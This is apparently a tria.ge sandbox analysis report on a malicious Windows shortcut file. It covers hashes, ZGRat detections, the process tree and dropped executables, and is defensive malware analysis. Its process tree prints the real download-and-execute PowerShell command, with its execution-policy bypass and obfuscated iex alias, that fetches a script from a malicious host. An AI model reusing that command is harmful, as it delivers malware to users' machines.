Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
51s -
max time network
49s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
06/05/2024, 13:51
Static task
static1
Behavioral task
behavioral1
Sample
51e431b4fa084108a9524d0467a925d518659ac886be3451ffe5ec86da707f4a.lnk
Resource
win7-20240220-en
General
-
Target
51e431b4fa084108a9524d0467a925d518659ac886be3451ffe5ec86da707f4a.lnk
-
Size
2KB
-
MD5
17dc01efda95cad71f3de00a136a6672
-
SHA1
7277a278d3c453adc868f5b27c2e937db3b0bf80
-
SHA256
51e431b4fa084108a9524d0467a925d518659ac886be3451ffe5ec86da707f4a
-
SHA512
33daa7f80b2e230ffd83e9211aa818679be9c0450871002ae0dc1892601592140011897173094a9e68bc9b164562f712633b9c56f5e273d636889d6923779f48
Malware Config
Extracted
http://timecheck.ug/ppx.ps1
Signatures
-
Detect ZGRat V1 32 IoCs
resource yara_rule behavioral2/memory/1596-46-0x0000000005AF0000-0x0000000005FA0000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-47-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-58-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-56-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-54-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-52-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-50-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-48-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-64-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-74-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-72-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-80-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-84-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-88-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-86-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-82-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-78-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-76-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-70-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-66-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-62-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-60-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-68-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-90-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-104-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-106-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-102-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-100-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-96-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-94-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-92-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 behavioral2/memory/1596-98-0x0000000005AF0000-0x0000000005F9B000-memory.dmp family_zgrat_v1 -
Blocklisted process makes network request 1 IoCs
flow pid Process 6 4796 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation xnc.exe -
Executes dropped EXE 5 IoCs
pid Process 2156 xnc.exe 3796 xnc.exe 1596 bvasdvdfsds.exe 3672 dfgdvdfsds.exe 4804 cvbfsds.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3796 xnc.exe 3796 xnc.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2156 set thread context of 3796 2156 xnc.exe 92 -
pid Process 4796 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4796 powershell.exe 4796 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2156 xnc.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4796 powershell.exe Token: SeDebugPrivilege 1596 bvasdvdfsds.exe Token: SeDebugPrivilege 3672 dfgdvdfsds.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2156 xnc.exe 3796 xnc.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 4328 wrote to memory of 4796 4328 cmd.exe 87 PID 4328 wrote to memory of 4796 4328 cmd.exe 87 PID 4796 wrote to memory of 2156 4796 powershell.exe 91 PID 4796 wrote to memory of 2156 4796 powershell.exe 91 PID 4796 wrote to memory of 2156 4796 powershell.exe 91 PID 2156 wrote to memory of 3796 2156 xnc.exe 92 PID 2156 wrote to memory of 3796 2156 xnc.exe 92 PID 2156 wrote to memory of 3796 2156 xnc.exe 92 PID 2156 wrote to memory of 3796 2156 xnc.exe 92 PID 3796 wrote to memory of 1596 3796 xnc.exe 100 PID 3796 wrote to memory of 1596 3796 xnc.exe 100 PID 3796 wrote to memory of 1596 3796 xnc.exe 100 PID 3796 wrote to memory of 3672 3796 xnc.exe 104 PID 3796 wrote to memory of 3672 3796 xnc.exe 104 PID 3796 wrote to memory of 3672 3796 xnc.exe 104 PID 3796 wrote to memory of 4804 3796 xnc.exe 105 PID 3796 wrote to memory of 4804 3796 xnc.exe 105 PID 3796 wrote to memory of 4804 3796 xnc.exe 105
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\51e431b4fa084108a9524d0467a925d518659ac886be3451ffe5ec86da707f4a.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4328 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -Windo 1 $Yh=[string][char[]]@(0x69,0x65,0x58) -replace ' ','';sal pv $Yh;$MP=((New-Object Net.WebClient)).DownloadString('http://timecheck.ug/ppx.ps1');pv $MP2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Users\Public\xnc.exe"C:\Users\Public\xnc.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Users\Public\xnc.exe"C:\Users\Public\xnc.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3796 -
C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe"C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe" 05⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1596
-
-
C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe"C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe" 05⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3672
-
-
C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe"C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe" 05⤵
- Executes dropped EXE
PID:4804
-
-
C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe"C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe" 05⤵PID:1632
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
5.3MB
MD5de08b70c1b36bce2c90a34b9e5e61f09
SHA11628635f073c61ad744d406a16d46dfac871c9c2
SHA256432747c04ab478a654328867d7ca806b52fedf1572c74712fa8b7c0edb71df67
SHA51218a30e480ce7d122cfad5a99570042e3bef9e1f9feda1f7be32b273a7248274285c65ac997c90d3d6a950a37b4ea62e6b928bfefc924187c90e32ea571bfd1f5
-
Filesize
4.1MB
MD53306d64e6ef152b9c053653e45481107
SHA1cf2a2917ea4ab3cdd6f48791600a77dbe9884937
SHA256ea40182e63ab26b3a32d41f2a115a4324f921033b65c3ff5c145674fde62c945
SHA51218d1a1d7de111a37f8ec7b07aa132c8f42e74a6b8bc56935782ce1d9a94f5192fff32f35b1530c84a0a983d5a7c108ffbddb777ed555dc503f87f6077fb716ff
-
Filesize
760KB
MD58333b78c2a3eacf8cfd843a7b62ce6ba
SHA181a4d7d00d04da14a6059ed068238a7e2321f721
SHA256aaeaf69dc4dd105e8e2d637a9336af389b7c3d5175421d80fabd5c91be86b665
SHA512c3fb49362632765d2fca9855b3ea004ba3548c8d86f92d4739b28623103b93ee532a03535b43628a1a00cd96198b91f319db9b1aa7891b17d2dedaa8ff919f27